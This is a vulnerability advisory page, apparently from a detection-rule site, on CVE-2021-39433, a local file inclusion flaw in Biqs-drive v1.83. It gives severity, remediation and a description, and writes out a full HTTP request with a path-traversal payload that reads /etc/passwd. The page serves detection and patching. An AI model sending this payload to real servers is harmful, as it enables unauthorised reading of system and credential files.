🔙 목록으로 돌아가기

CVE-2021-39433: BIQS IT Biqs-drive v1.83 Local File Inclusion

TitleBIQS IT Biqs-drive v1.83 Local File Inclusion
AuthorVeshraj
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
RemediationUpgrade to the latest version of BIQS IT Biqs-drive (v1.84 or higher) which includes a fix for the Local File Inclusion vulnerability.
CVSS Score7.5
EPSS Score0.81123
CVE IDCVE-2021-39433
Tags cve2021 cve lfi biqsdrive biqs vuln

🔍 Vulnerability Description

A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.

🌐 HTTP Request

GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; es-es) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39433.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-39433.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A